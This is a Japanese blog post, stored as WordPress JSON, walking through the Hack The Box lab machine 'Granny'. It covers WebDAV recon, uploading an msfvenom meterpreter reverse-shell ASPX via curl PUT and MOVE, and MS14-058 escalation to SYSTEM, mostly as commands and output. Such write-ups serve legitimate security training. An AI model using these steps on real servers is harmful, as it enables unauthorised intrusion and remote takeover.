{"id":3756,"date":"2020-08-20T23:35:22","date_gmt":"2020-08-20T14:35:22","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3756"},"modified":"2020-08-30T23:32:11","modified_gmt":"2020-08-30T14:32:11","slug":"hack-the-box-granny-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3756","title":{"rendered":"Hack The Box – Granny – Walkthrough"},"content":{"rendered":"

80\u756a\u30dd\u30fc\u30c8\u3067frontpage\u3068\u3044\u3046\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b<\/h3>\n

\"\"<\/a><\/p>\n

\r\n# nmap -A -n -F -T5 granny.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-18 13:09 UTC\r\nStats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan\r\nSYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining)\r\nNmap scan report for granny.htb (10.10.10.15)\r\nHost is up (0.045s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Microsoft IIS httpd 6.0\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT\r\n|_http-server-header: Microsoft-IIS\/6.0\r\n|_http-title: Under Construction\r\n| http-webdav-scan:\r\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n|   Server Date: Tue, 18 Aug 2020 13:15:25 GMT\r\n|   WebDAV type: Unknown\r\n|_  Server Type: Microsoft-IIS\/6.0\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nAggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\n# nmap -T4 --script vuln 10.10.10.15\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-18 13:10 UTC\r\nNmap scan report for 10.10.10.15\r\nHost is up (0.038s latency).\r\nNot shown: 999 filtered ports\r\nPORT   STATE SERVICE\r\n80\/tcp open  http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/_vti_bin\/: Frontpage file or folder\r\n|   \/_vti_log\/: Frontpage file or folder\r\n|   \/postinfo.html: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.exe: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.exe: Frontpage file or folder\r\n|   \/_vti_bin\/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.dll: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.exe: Frontpage file or folder\r\n|   \/images\/: Potentially interesting folder\r\n|_  \/_private\/: Potentially interesting folder\r\n| http-frontpage-login:\r\n|   VULNERABLE:\r\n|   Frontpage extension anonymous login\r\n|     State: VULNERABLE\r\n|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.\r\n|\r\n|     References:\r\n|_      http:\/\/insecure.org\/sploits\/Microsoft.frontpage.insecurities.html\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n<\/pre>\n
WebDAV\u304c\u6709\u52b9\u3067\u3042\u308a\u3001\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u304c\u53ef\u80fd<\/h3>\n
\r\n# perl nikto.pl -h http:\/\/granny.htb\/\r\n- ***** SSL support not available (see docs for SSL install) *****\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.15\r\n+ Target Hostname:    granny.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-18 15:01:46 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Microsoft-IIS\/6.0\r\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\r\n+ Retrieved x-powered-by header: ASP.NET\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Retrieved dasl header: <DAV:sql>\r\n+ Retrieved dav header: 1, 2\r\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\r\n+ Uncommon header 'ms-author-via' found, with contents: MS-FP\/4.0,DAV\r\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed)\r\n+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http:\/\/granny\/_vti_bin\/_vti_aut\/author.dll\r\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\r\n+ OSVDB-3233: \/_vti_bin\/: FrontPage directory found.\r\n+ OSVDB-3300: \/_vti_bin\/: shtml.exe\/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).\r\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\r\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\r\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\r\n+ Retrieved x-aspnet-version header: 1.1.4322\r\n+ 8110 requests: 6 error(s) and 26 item(s) reported on remote host\r\n+ End Time:           2020-08-18 15:41:16 (GMT0) (2370 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n\r\n# davtest --url http:\/\/granny.htb\/\r\n********************************************************\r\n Testing DAV connection\r\nOPEN            SUCCEED:                http:\/\/granny.htb\r\n********************************************************\r\nNOTE    Random string for this session: 1qjcRJmh6BgKgoh\r\n********************************************************\r\n Creating directory\r\nMKCOL           SUCCEED:                Created http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\r\n********************************************************\r\n Sending test files\r\nPUT     html    SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nPUT     php     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.php\r\nPUT     asp     FAIL\r\nPUT     cgi     FAIL\r\nPUT     jsp     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jsp\r\nPUT     jhtml   SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jhtml\r\nPUT     shtml   FAIL\r\nPUT     txt     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nPUT     aspx    FAIL\r\nPUT     cfm     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.cfm\r\nPUT     pl      SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.pl\r\n********************************************************\r\n Checking for test file execution\r\nEXEC    html    SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nEXEC    php     FAIL\r\nEXEC    jsp     FAIL\r\nEXEC    jhtml   FAIL\r\nEXEC    txt     SUCCEED:        http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nEXEC    cfm     FAIL\r\nEXEC    pl      FAIL\r\n\r\n********************************************************\r\n\/usr\/bin\/davtest Summary:\r\nCreated: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.php\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jsp\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.jhtml\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.cfm\r\nPUT File: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.pl\r\nExecutes: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.html\r\nExecutes: http:\/\/granny.htb\/DavTestDir_1qjcRJmh6BgKgoh\/davtest_1qjcRJmh6BgKgoh.txt\r\n\r\n# echo "Test" > test.html\r\n\r\n# curl -X PUT http:\/\/granny.htb\/test.html -d @test.html\r\n\r\n# curl http:\/\/granny.htb\/test.html\r\nTest\r\n<\/pre>\n
Exploit\u30b3\u30fc\u30c9\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001\u30b7\u30a7\u30eb\u3092\u596a\u53d6\u3059\u308b<\/h3>\n
\r\n# msfvenom -a x86 --platform Windows -p windows\/meterpreter\/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx\r\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\r\n[-] No arch selected, selecting arch: x86 from the payload\r\nNo encoder specified, outputting raw payload\r\nPayload size: 324 bytes\r\nFinal size of aspx file: 2716 bytes\r\nSaved as: shell.aspx\r\n\r\n# mv shell.aspx shell.txt\r\n\r\n# curl -X PUT http:\/\/granny.htb\/shell.txt --data-binary @shell.txt\r\n\r\n# curl -X MOVE --header 'Destination:http:\/\/granny.htb\/shell.aspx' 'http:\/\/granny.htb\/shell.txt'\r\n\r\n# msfconsole\r\n\r\nmsf5 > use exploit\/multi\/handler\r\n[*] Using configured payload generic\/shell_reverse_tcp\r\n\r\nmsf5 exploit(multi\/handler) > set LHOST 0.0.0.0\r\nLHOST => 0.0.0.0\r\n\r\nmsf5 exploit(multi\/handler) > exploit\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n<\/pre>\n
\u30b5\u30a4\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3053\u3068\u3067\u30bb\u30c3\u30b7\u30e7\u30f3\u304c\u53d6\u5f97\u3067\u304d\u308b\u3002\u3059\u3050\u306b\u30bb\u30c3\u30b7\u30e7\u30f3\u304c\u5207\u308c\u308b\u305f\u3081\u3001\u3059\u3050\u306b\u30d0\u30c3\u30af\u30b0\u30e9\u30a6\u30f3\u30c9\u306b\u3002
\n\"\"<\/a><\/p>\n
\r\n[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000\r\n\r\nbackground\r\n\r\nBackground session 1? [y\/N]  y\r\n\r\nmsf5 exploit(multi\/handler) > sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type             Information  Connection\r\n  --  ----  ----             -----------  ----------\r\n  1         shell sparc\/bsd               172.17.0.2:4444 -> 172.17.0.1:34058 (172.17.0.1)\r\n\r\n<\/pre>\n
\u4ed6\u306eWriteup\u3067\u306fType\u304cWindows\u3060\u3063\u305f\u304c\u3001\u306a\u305c\u304bsparc\/bsd\u3060\u3063\u305f\u3002\u3053\u306e\u305b\u3044\u3067\u306a\u304b\u306a\u304b\u82e6\u52b4\u3057\u305f\u3002<\/p>\n
sysinfo\u304b\u3089\u8106\u5f31\u6027\u3092\u898b\u3064\u3051\u308b<\/h3>\n
sysinfo\u30c7\u30fc\u30bf\u53d6\u5f97\u90e8\u5206\u306f\u5272\u611b\u3059\u308b\u3002<\/p>\n
\r\n# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo \/home\/shimizu\/granny\/systeminfo.txt --quiet\r\n[*] initiating winsploit version 3.3...\r\n[*] database file detected as xls or xlsx based on extension\r\n[*] attempting to read from the systeminfo input file\r\n[+] systeminfo input file read successfully (ascii)\r\n[*] querying database file for potential vulnerabilities\r\n[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits\r\n[*] there are now 356 remaining vulns\r\n[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin\r\n[+] windows version identified as 'Windows 2003 SP2 32-bit'\r\n[*]\r\n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\r\n[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\r\n[E] MS14-070: Vulnerability in TCP\/IP Could Allow Elevation of Privilege (2989935) - Important\r\n[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\r\n[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\r\n[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important\r\n[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\r\n[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important\r\n[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical\r\n[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical\r\n[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important\r\n[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical\r\n[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important\r\n[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important\r\n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\r\n[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical\r\n[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\r\n[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical\r\n[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important\r\n[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical\r\n[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical\r\n[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical\r\n[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical\r\n[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical\r\n[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical\r\n[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important\r\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\r\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\r\n[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical\r\n[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important\r\n[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical\r\n[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical\r\n[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) x- Critical\r\n[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important\r\n[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important\r\n[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important\r\n[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical\r\n[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical\r\n[M] MS08-078: Security Update for Internet Explorer (960714) - Critical\r\n[*] done\r\n<\/pre>\n
MS14-058\u3088\u308a\u7ba1\u7406\u8005\u6a29\u9650\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
\r\nmsf5 exploit(multi\/handler) > use windows\/local\/ms14_058_track_popup_menu\r\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > set SESSION 1\r\nSESSION => 1\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > set LHOST 10.10.14.21\r\nLHOST => 10.10.14.21\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > exploit\r\n\r\n[!] SESSION may not be compatible with this module.\r\n[-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] 172.17.0.1 - Command shell session 1 closed.\r\n[*] Sending stage (176195 bytes) to 172.17.0.1\r\n[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000\r\n[-] Exploit aborted due to failure: none: Session is already elevated\r\n[*] Exploit completed, but no session was created.\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Name  Type                     Information                            Connection\r\n  --  ----  ----                     -----------                            ----------\r\n  2         meterpreter x86\/windows  NT AUTHORITY\\NETWORK SERVICE @ GRANNY  172.17.0.2:4444 -> 172.17.0.1:34062 (10.10.10.15)\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > set SESSION 2\r\nSESSION => 2\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Launching notepad to host the exploit...\r\n[+] Process 3620 launched.\r\n[*] Reflectively injecting the exploit DLL into 3620...\r\n[*] Injecting exploit into 3620...\r\n[*] Exploit injected. Injecting payload into 3620...\r\n[*] Payload injected. Executing exploit...\r\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n[*] Sending stage (176195 bytes) to 172.17.0.1\r\n[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000\r\n\r\nmeterpreter > getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter > shell\r\nProcess 2128 created.\r\nChannel 2 created.\r\nMicrosoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nc:\\windows\\system32\\inetsrv>cd C:\\Documents and Settings\\Lakis\\Desktop\r\ncd C:\\Documents and Settings\\Lakis\\Desktop\\\r\n\r\nC:\\Documents and Settings\\Lakis\\Desktop>type user.txt\r\ntype user.txt\r\n700c5dc163014e22b3e408f8703f67d1\r\n\r\nC:\\Documents and Settings\\Lakis\\Desktop>cd C:\\Documents and Settings\\Administrator\\Desktop\r\ncd C:\\Documents and Settings\\Administrator\\Desktop\r\n\r\nC:\\Documents and Settings\\Administrator\\Desktop>type root.txt\r\ntype root.txt\r\naa4beed1c0584445ab463a6747bd06e9\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
80\u756a\u30dd\u30fc\u30c8\u3067frontpage\u3068\u3044\u3046\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b # nmap -A -n -F -T5 granny.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3756"}],"version-history":[{"count":3,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions"}],"predecessor-version":[{"id":3780,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions\/3780"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3756"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3756"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3756"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}